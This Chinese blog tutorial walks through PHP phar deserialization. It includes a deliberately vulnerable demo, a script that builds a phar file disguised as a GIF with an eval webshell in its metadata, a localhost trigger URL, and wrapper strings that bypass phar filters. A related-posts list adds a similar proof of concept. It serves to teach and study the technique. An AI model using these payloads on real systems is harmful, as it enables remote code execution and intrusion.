学习phar反序列化(看不懂别忍着,直接喷)

已于 2023-01-13 13:44:04 修改
阅读量157 收藏
点赞数
分类专栏: PHP安全 文章标签: php web安全 Powered by 金山文档
于 2023-01-13 13:37:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59924300/article/details/128672929
版权

phar是一种文件格式,用于将整个PHP应用程序(包括PHP文件、脚本和其他资源)打包成单个文件。PHAR文件具有.phar扩展名,通常用作PHP应用程序的分发格式,因为它们可以在安装了PHP的任何系统上轻松部署和运行

phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容

stub:phar文件的标志,必须以 xxx __HALT_COMPILER();?> 结尾,否则无法识别。xxx可以为自定义内容。
manifest:phar文件本质上是一种压缩文件,其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data,这是漏洞利用最核心的地方。
content:被压缩文件的内容
signature (可空):签名,放在末尾。

其中meta-data是关键

这个有序列化操作,php大部分的文件系统函数在通过phar://伪协议解析phar文件时,都会将meta-data进行反序列化,知道创宇测试后发布的受影响的函数如下:

下面是个简单的例子:

首先要在php.ini里面把readonly的值设置为Off

创建一个测试环境demo(1.php)模拟反序列化。

<?php
$filename=$_GET['filename'];
class AnyClass{
    var $output = 'echo "cck";';
    function __destruct()
    {
        eval($this -> output);
    }
}
file_exists($filename); //通过file_exists参数来触发反序列化

再创建一个生成phar文件的demo(2.php)模拟序列化。

<?php
class AnyClass{
    var $output = 'echo "cck";';
    function __destruct()
    {
        eval($this -> output);
    }
}
$phar = new Phar('phar.phar'); //文件格式必须是.phar结尾
$phar -> stopBuffering();
$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>'); //伪装诚gif文件
$phar -> addFromString('test.txt','test');
$object = new AnyClass();
$object -> output= 'eval(@$_GET[\'a\']);';
$phar -> setMetadata($object);
$phar -> stopBuffering();
?>

把生成phar文件的demo放在测试环境的根目录下,让php解析发现会生成phar.phar文件,将phar.phar改成phar.gif文件。

此时查看phar.gif

此时访问

http://127.0.0.1:8036/1.php?filename=phar://phar.gif&a=phpinfo();

利用条件:

关闭readonly模式

文件操作函数的参数可控,且:、/、phar等特殊字符没有被过滤

要有可用的魔术方法作为“跳板”。

一些绕过方式

当环境限制了phar不能出现在前面的字符里

compress.bzip://phar:///test.phar/test.txt
compress.bzip2://phar:///test.phar/test.txt
compress.zlib://phar:///home/sx/test.phar/test.txt
php://filter/resource=phar:///test.phar/test.txt
php://filter/read=convert.base64-encode/resource=phar://phar.phar

参考:

https://blog.csdn.net/xiaolong22333/article/details/116092578

https://www.freebuf.com/articles/web/205943.html

FlynnAAAA
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php phar包的使用教程详解
10-17
下面这篇文章主要给大家介绍了关于PHPphar包使用的相关资料,文介绍的还是相对比较详细的,需要的朋友们下面来一起看看吧。
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
Phar的一些利用姿势
XL115715453的博客
12-27 941
文章首发于先知社区:https://xz.aliyun.com/t/3692 Phar的简述 翻译自手册:phar是什么?Phar归档最好的特点是可以方便地将多个文件组合成一个文件。因此,phar归档提供了一种方法,可以将完整的PHP应用程序分发到单个文件,并从该文件运行它,而不需要将其提取到磁盘。此外,PHP可以像执行任何其他文件一样轻松地执行phar归档,无论是在命令行上还是在...
phar反序列化
qq_42307546的博客
10-14 137
phpar反序列化
PHPphar文件详解_phar文件格式_调用phar类方法生成phar文件
Ho1aAs‘s Blog
09-04 7820
phar简介 phar,全称为PHP Archive,phar扩展提供了一种将整个PHP应用程序放入.phar文件的方法,以方便移动、安装。.phar文件的最大特点是将几个文件组合成一个文件的便捷方式,.phar文件提供了一种将完整的PHP程序分布在一个文件并从该文件运行的方法。 可以将phar文件类比为一个压缩文件 phar demo 注意:默认phar扩展是只读模式,需要手动配置php.iniphar.readonly= Off 无法用ini_set修改 『踩坑记录』PHP-使用ini_set
关于php----phar伪协议和phar文件反序列化漏洞利用
m0_62107966的博客
09-12 2027
关于php----phar伪协议和phar文件反序列化漏洞利用pharphp archive)含义为php 归档文件。如果一个由多个文件构成的php应用程序,可以合并打包为一个文件夹,类似于javaweb项目里的jar文件的话,对于程序员来说是很方便的。在PHP5.3之后支持了类似Java的jar包,名为phar。用来将多个PHP文件打包为一个文件。要生成phar文件的话也是很方便,不需要借助额外的工具来创建或者使用,通过php脚本运行就自动在该脚本所在目录下自动创建。
phar文件上传的骚姿势(绕过phar、_HALT)
qq_62046696的博客
10-07 1832
前面也讲过一次phar文件上传的东西,但是那都是过滤比较低,仅仅过滤了后缀。知道今天看到了一篇好的文章。
KiteCMS的漏洞挖掘之旅(任意文件写入、任意文件读取和反序列化)1
08-03
虽然`file_get_contents`和`file_put_contents`可以触发文件操作,但由于路径控制有限,它们不能直接用于Phar反序列化攻击。然而,通过全局搜索`is_dir`函数,作者发现了`scanFilesForTree`方法,其的`$dir`变量是...
Laravel8反序列化POP链分析挖掘 .pdf
09-05
在Laravel 8,作者提到了CVE-2021-3129,这是一个在Debug模式下可能导致任意代码执行的漏洞,它涉及到Phar反序列化。然而,随着框架版本的升级,Laravel对某些类添加了`__wake`方法以限制反序列化,这使得传统的...
mix-phar-skeleton:Phar命令行程序开发框架
04-24
Mix Phar Skeleton 命令行单执行文件 Phar 开发程序骨架,Mix 封装的命令行基础设施在骨架都可使用。 我们提供了打包工具 ,可以将本项目打包为 Phar 文件(就像 golang 编译成执行文件一样)。 PHP 原本就是一个...
php归档格式:phar文件详解(创建、使用、解包还原提取)
热门推荐
云客的技术博客【云游天下 做客四方】
02-10 1万+
一个php应用程序往往是由多个文件构成的,如果能把他们集为一个文件来分发和运行是很方便的,这样的列子有很多,比如在window操作系统上面的安装程序、一个jquery库等等,为了做到这点php采用了phar文档文件格式,这个概念源自java的jar,但是在设计时主要针对 PHPWeb 环境,与 JAR 归档不同的是Phar 归档可由 PHP 本身处理,因此不需要使用额外的工具来创建或使用,
phar文件解压还原
pzqingchong的专栏
09-08 5751
phar文件解压还原
Phar文件
weixin_34345753的博客
06-01 139
  phar 扩展名文件提供了一种将整个PHP应用程序打包放入一个被称之为phar(PHP archive)的文件从而更加容易便利地发布和安装的方法。就像是java的jar文件有点类似。除了这个功能外,Phar扩展名也提供一种对文件格式的抽象方法,以便通过PharData类创建和操作tar/zip文件,非常类似于PDO提供了一种统一的访问不同数据库的借口一样。和PDO不一样的是(POD不能再不同数...
Phar反序列化
weixin_63231007的博客
06-06 1585
phar (PHP Archive) 是PHP里类似于Javajar的一种打包文件,用于归档。当PHP 版本>=5.3时默认开启支持PHAR文件的。phar文件默认状态是只读,使用phar文件不需要任何的配置。而phar://伪协议即PHP归档,用来解析phar文件内容。生成、使用phar文件php.ini需要设置 phar.readonly=off 生成特殊的phar文件,使代码运行第六行,打印flag phar文件metadata以序列化形式存储,解析phar文件时会进行反序列化操作。
phar反序列化小结
Lethe's Blog
11-13 3024
0x00 phar反序列化 phar反序列化即在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以不依赖unserialize()直接进行反序列化操作。 关于其他反序列化的总结,可以看我的这篇文章 0x01 原理 首先了解一下phar文件的结构,一个phar文件由四部分构成: a stub:可以理解为一个标志,格式为xxx<...
phar文件的使用
weixin_34377065的博客
08-08 173
1.用php命令行 php phar文件 2.生成bat文件,在命令行下使用,以composer.phar为例 ( 1)在php.exe所在目录新建composer.bat文件 (2)把composer.phar移动到php.exe所在目录 (3)在php.exe所在目录打开命令行窗口执行echo @php "%~dp0composer.phar" %*>compos...
phar反序列化poc
最新发布
05-21
Phar反序列化漏洞是指攻击者利用PHPPhar文件解析器对不受信任数据进行反序列化攻击的一种安全漏洞。攻击者可以通过构造特定的Phar文件,触发解析器反序列化恶意代码,从而实现远程代码执行。 一个简单的Phar反序列化POC如下: ``` <?php class Example { public $command; } $phar = new Phar('phar.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $example = new Example(); $example->command = 'echo "Hello World";'; $phar->setMetadata($example); $phar->stopBuffering(); include 'phar://phar.phar/test.txt'; ?> ``` 上述POC,攻击者创建了一个含有恶意代码的Phar文件,并将其反序列化到`$example`变量,最后通过`include`语句触发远程代码执行。 相关问题: 1. 什么是Phar文件? 2. 什么是反序列化漏洞? 3. 如何防范Phar反序列化漏洞?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值